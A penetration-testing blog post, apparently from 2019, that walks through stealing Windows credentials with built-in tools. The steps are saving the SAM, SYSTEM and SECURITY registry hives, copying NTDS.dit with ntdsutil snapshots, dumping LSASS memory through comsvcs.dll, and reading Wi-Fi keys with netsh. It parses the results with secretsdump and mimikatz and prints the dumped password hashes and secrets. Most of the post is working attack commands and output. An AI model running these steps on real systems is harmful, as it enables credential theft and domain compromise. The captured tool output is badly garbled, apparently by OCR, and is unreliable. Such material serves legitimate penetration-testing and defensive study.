Infrastructure

Extracting Windows Credentials Using Native Tools

2019
bordergate

Most penetration testing toolkits offer the ability to extract host credentials. However being able to carry out this task in environments where code execution may be detected, or is prevented through application whitelisting is useful.

In this post we’re going to be looking at how to extract some of these credentials only using native Windows tools.

Extracting the SAM database

The Security Account Manager (SAM) database stores user passwords on a system. Given local administrator access to a host, these credentials can be retrieved by taking a backup of a portion of the systems registry:

reg save hklm\sam c:\SAM
reg save hklm\system c:\SYSTEM
reg save hklm\security c:\SECURITY
: ystem32 >reg<br /> he operation completed<br /> : ystem32 >reg<br /> he operation completed<br /> : ystem32 >reg<br /> he operation completed<br /> saue hklm\sam c<br /> successfully.<br /> saue hklm\system c<br /> successfully.<br /> saue hklm\security c<br /> successfully.

The files can then be copied to a Linux system, and recontructed using impacket-secretsdump:

impacket-secretsdump -sam /root/SAM -security /root/SECURITY -system /root/SYSTEM LOCAL
impacket-secretsdump -sam SAM -system SYSTEM -security Impacket vO.9.17 Copyright 2002-2018 Core Security Technologies Target system bootKey: ox2dc29121d5755e2a5bfd6b255a443909 [*] Dumping local SAM hashes (uid: rid: Imhash:nthash) SECURITY LOCAL Administrator : 500 : aad3b435b51404eeaad3b435b51404ee : fc525c9683e8fe067095ba2ddc971889 : : : Guest : 501 : aad3b435b51404eeaad3b435b51404ee : cf184ecf7d18d9d6c3d7aaob98b85b46 : . IEUser: 1000 : aad3b435b51404eeaad3b435b51404ee : fc525c9683e8fe067095ba2ddc9718892 : : sshd : 1001 : aad3b435b51404eeaad3b435b51404ee : b311doe43bc4d9c93c408cc7ba8efa81: : . sshd server: : . [*] Dumping cached domain logon information (uid:encryptedHash: longDomain:domain) alice :486d32ad143aa6f537debb3bf88abdf7 : BGTEST. LOCAL: BGTEST: : . [*] Dumping LSA Secrets [ * ] $MACHINE.ACC $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:8effd0fb3ddbb38623d9bd5a75ebf242 [ * ] DPAPI SYSTEM 0000 0010 0020 01 OO OO OO 87 BB OO 13 2B 5E 4A 9A 7F 55 DO 8D D7 26 6C 9F 80 DE 69 88 A7 13 3B E4 30 67 F7 A2 Fl 09 98 76 C6 A3 2F CC F9 EB 90 DF i...;.og.. ..v.•/.. DPAPI SYSTEM:0100000087bb00132b5e4a9a7f55d08dd7266c9fb0de6988a7133be43067f7a2f1099876c6a32fccf9eb90df [ * ] NL$KM 0000 0010 0020 0030 DO 26 02 75 22 57 AD 76 17 ED 62 46 85 46 80 17 86 96 97 DO 72 26 53 DI CO E3 22 14 AE .&.WV.......r.J. ..u..b./....S.". NL$KM:c7d00222ed175bfd5a1f1700bbd1coa2a726dc5776edd38ac6b5c196729a4a147ad13f3cege8469a5d46be9726af5ca7b0db75ad ea621c2ff3bbb6d053e322ae [ * ] SC openssHd (Unknown User) Cleaning up...

Extracting the NTDS database

The New Technology Directory Services (NTDS) database stores passwords for users in an Active Directory domain. The file is typically located at %SystemRoot%\NTDS\Ntds.dit. Since the file is locked whilst the domain controller is powered on, taking a copy of the file requires using volume shadow copies.

Ntdsutil

The ntdsutil utility can be used to backup the database:

ntdsutil "ac in ntds" i "cr fu c:\temp" q q
Administrator: C: \Windows \system32 Microsoft Windows [Uersion 6 ] Copyright (c) 2009 Microsoft Corporation . All rights reserved. "ac in ntds" i • 'cr Fu q q ntdsutil: ac in ntds Active instance set to • 'ntds". ntdsutil: i if m: cr Fu Creating snapshot... Snapshot set generated successfully. Snapshot mounted as _UOLUMEC$\ Snapshot is already mounted. Initiating DEFRAGMENTATION mode. Source Database: .dit Target Database: Directory\ntds . dit Defragmentation opying registry Files. Copying c Copying c Snapshot IF" media created successfully in tdsutil: q : is trator><br /> Status (z complete)<br /> 90<br /> unmounted.<br /> c : \temp<br /> 1 øø

Copy these files to a Linux system and extract using secretsdump:

impacket-secretsdump -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL
impacket-secretsdump -ntds ntds.dit -system SYSTEM Impacket vO.9.17 Copyright 2002-2018 Core Security Technologies Target system bootKey: ox489d2e6c6631120aa9657ae8eca07470 -security SECURITY LOCAL [*] Dumping cached domain logon information (uid:encryptedHash: longDomain:domain) [*] Dumping LSA Secrets [ * ] $MACHINE.ACC $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:8de0026a4ec8dc85689014d8b2418501 DefaultPassword (Unknown user) [ * ] DPAPI SYSTEM 0000 0010 0020 01 oo oo oo 47 58 06 14 19 FD E7 82 FD IF E2 DD FC D5 20 DA 79 85 7A 46 02 8B 10 5E 50 6A 6A 44 D9 30 DD 29 5D 7C 4D 8D 86 E3 OE AD • ..A]jjD .Y.zF.... DPAPI SYSTEM:010000004758d61402bb105e5d6a6a4419fde7b2fd1fe2ddd930dd295d7c4d8dfcd520da79b57a46b6e30ead [ * ] NL$KM 0000 0010 0020 0030 A4 FA 62 E9 82 OD 71 A9 75 FF El 80 09 36 E6 9F 4F AA 16 24 Fl 4E OA 37 DD 11 82 C9 1B 46 33 09 OA 6B AO 9C AF FD 83 EA 09 25 C9 7B 95 F6 96 90 33 23 2A 5A 27 50 DI 01 AA 07 51 10 AA 06 A6 7E NL$KM: a4fa62e9b20d71a90a6ba09caffdb3ea75ffe1800936e69f0925c97b95f696904faa1624f14eoa3733232a5a2750d101dd11b2c9 1b463309aa075110aa06a67e [*] Dumping Domain Credentials (domain\uid: rid: Imhash:nthash) [*] Searching for pekList, be patient PEK # O found and decrypted: 219a7512b5121d31da37f3e18f72799e [*] Reading and decrypting hashes from ntds.dit Administrator: 500 : aad3b435b51404eeaad3b435b51404ee : 64f12cddaa88057e06a81b54e73b949b: : . Guest : 501 : : 31d6cfe0d16ae931b73c59d7eoc089co: . . WIN-S16N6K2RCAE$ : 1000 : aad3b435b51404eeaad3b435b51404ee : 8de0026a4ec8dc85689014d8b2418501 : : : krbtgt : 502 : aad3b435b51404eeaad3b435b51404ee : 2e612bfcfoe63c9ab807e18cb80c104f : : : CLIENTI$ : 1103 : aad3b435b51404eeaad3b435b51404ee : 8effd0fb3ddbb38623d9bd5a75ebf242: : : bgtest . : 1104 : aad3b435b51404eeaad3b435b51404ee : 64f12cddaa88057e06a81b54e73b949b : : :

Extracting Logon Credentials From LSASS

The Local Security Authority Subsystem Service (LSASS) is a process responsible for enforcing security on a Windows system. By creating a memory dump of the process, we can extract plaintext credentials.

With local administrator rights on a host, open task manager, find lsass.exe, right click and select “Create Dump File”

C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image005.png
C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image006.png

LSASS can also be extracted using the command line using the comsvc DLL:

.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\Windows\Tasks\lsass.dmp full

Mimikatz can then dump the plaintext login credentials:

sekurlsa::Minidump lsass.DMP
sekurlsa::logonPasswords
C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image007.png

Extracting Wi-Fi Passwords

Wi-Fi passwords can be extracted from the command line by entering the following:

netsh wlan show profiles
netsh wlan show profile name="ConnectionName" key=clear

The security key will be shown under the key content section:

Connectivity settings Number Of SSIDs SSID Network type Radio type Vendor extension Security settings Authentication Cipher Authentication Cipher Security key Key Content . Infrastructure : [ Any Radio Type ] Not present . WA2-PersonaI . WA2-PersonaI . Unknown . Present

Related Posts

Infrastructure

Active Directory Schema Modification

2024
bordergate
Infrastructure

Exploiting Tomcat

2024
bordergate
Infrastructure

Attacking MSSQL

2024
bordergate
Infrastructure

Golden gMSA Attacks

2024
bordergate